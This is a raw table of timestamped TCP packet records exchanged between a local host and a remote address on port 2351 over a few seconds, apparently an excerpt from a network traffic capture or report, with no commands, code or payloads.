Sep 23, 2023 08:02:07.403374910 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403423071 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.403441906 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403480053 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403527021 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.403548002 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403584003 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403623104 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403635979 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.403712988 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403770924 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.403810024 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403850079 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.403901100 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.403940916 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404064894 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404114962 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.404169083 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404258013 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404297113 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404315948 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.404366016 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404402018 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404421091 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.404438019 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404488087 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.404586077 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404623032 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404674053 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.404680967 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404717922 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404755116 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404769897 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.404795885 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404845953 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.404896975 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404934883 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.404978991 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.405045986 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.405082941 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.405118942 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.405129910 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.405154943 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.405206919 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.405251026 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.405287981 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.405337095 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.405355930 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.405392885 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.405441999 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.405520916 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.405595064 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.405646086 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.409920931 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.409943104 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.409995079 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.409996033 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410073042 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410121918 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.410141945 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410206079 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410252094 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.410254955 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410402060 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410437107 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410453081 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.410614014 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410665035 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.410684109 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410742998 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410788059 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.410788059 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410836935 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410882950 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.410900116 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410923004 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.410967112 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.410979986 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411026955 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411072016 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.411087036 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411159039 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411190987 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411206961 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.411230087 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411273956 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.411287069 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411338091 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411384106 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.411386013 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411436081 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411480904 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.411487103 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411530972 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411573887 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.411638021 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411705971 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411752939 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.411910057 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411953926 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.411998034 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.412028074 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.412077904 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.412117004 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.412120104 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.412180901 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.412228107 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.412230015 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.412255049 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.412297964 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.412337065 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.412447929 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.412497997 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.444566965 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.444634914 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.444673061 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.444711924 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.444747925 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.444751978 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.444766998 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.444785118 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.444823027 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.444837093 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.444859982 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.444909096 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.721098900 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.721168041 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.721189976 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.721215963 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.721261024 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.721297979 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.721298933 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.721338034 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.721349001 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.721375942 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.721375942 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.721432924 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.721735954 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.721790075 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.721828938 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.721843004 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.721864939 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.721910954 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.721935987 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722003937 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722042084 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722059965 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.722124100 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722173929 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.722187996 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722223997 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722266912 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722276926 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.722304106 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722357988 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.722371101 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722470045 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722506046 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722522020 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.722583055 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722618103 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722630024 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.722657919 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722697973 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722711086 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.722764969 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722800970 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722815990 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.722898960 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.722949982 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.723006010 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723078966 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723115921 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723131895 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.723198891 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723256111 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.723269939 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723308086 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723345041 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723360062 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.723412991 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723463058 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.723505974 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723577976 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723613977 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723629951 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.723659992 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723711967 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.723727942 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723818064 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.723870039 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.723929882 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.724148989 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.724200964 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.724287033 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.724540949 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.724576950 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.724591970 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.724613905 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.724663973 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.724682093 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.724749088 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.724785089 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.724798918 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.724823952 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.724863052 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:07.724875927 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.724922895 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.748087883 CEST	49714	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:07.886045933 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.069886923 CEST	2351	49714	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.212865114 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.213021994 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.213279963 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.545937061 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.546003103 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.546042919 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.546078920 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.546111107 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.546116114 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.546143055 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.546153069 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.546192884 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.546199083 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.546230078 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.546267986 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.546283007 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.546304941 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.546355009 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.869541883 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.869599104 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.869635105 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.869671106 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.869673967 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.869712114 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.869728088 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.869748116 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.869782925 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.869793892 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.869820118 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.869854927 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.869865894 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.869891882 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.869939089 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.870012045 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.870049953 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.870095968 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.870152950 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.870225906 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.870275974 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.870357037 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.870438099 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.870484114 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.870516062 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.870584011 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.870619059 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:08.870630980 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:08.914040089 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.191382885 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191441059 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191478014 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191509008 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.191513062 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191549063 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191587925 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191626072 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191656113 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.191656113 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.191662073 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191698074 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191711903 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.191734076 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191770077 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191786051 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.191806078 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191842079 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191860914 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.191876888 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191912889 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.191942930 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.192050934 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.192087889 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.192115068 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.192190886 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.192251921 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.192260027 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.192358017 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.192416906 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.192454100 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.192538977 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.192600012 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.192605972 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.192743063 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.192801952 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.192806959 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.192874908 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.192936897 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.192995071 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.193063021 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.193099976 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.193119049 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.193212032 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.193249941 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.193274021 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.193284988 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.193322897 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.193336964 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.193360090 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.193409920 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.193428040 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.193495035 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.193555117 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.236208916 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.236252069 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.236326933 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.513348103 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.513417959 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.513458014 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.513494968 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.513510942 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.513534069 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.513552904 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.513751030 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.513787985 CEST	2351	49715	94.228.169.143	192.168.2.3
Sep 23, 2023 08:02:09.513809919 CEST	49715	2351	192.168.2.3	94.228.169.143
Sep 23, 2023 08:02:09.513823986 CEST	2351	49715	94.228.169.143	192.168.2.3
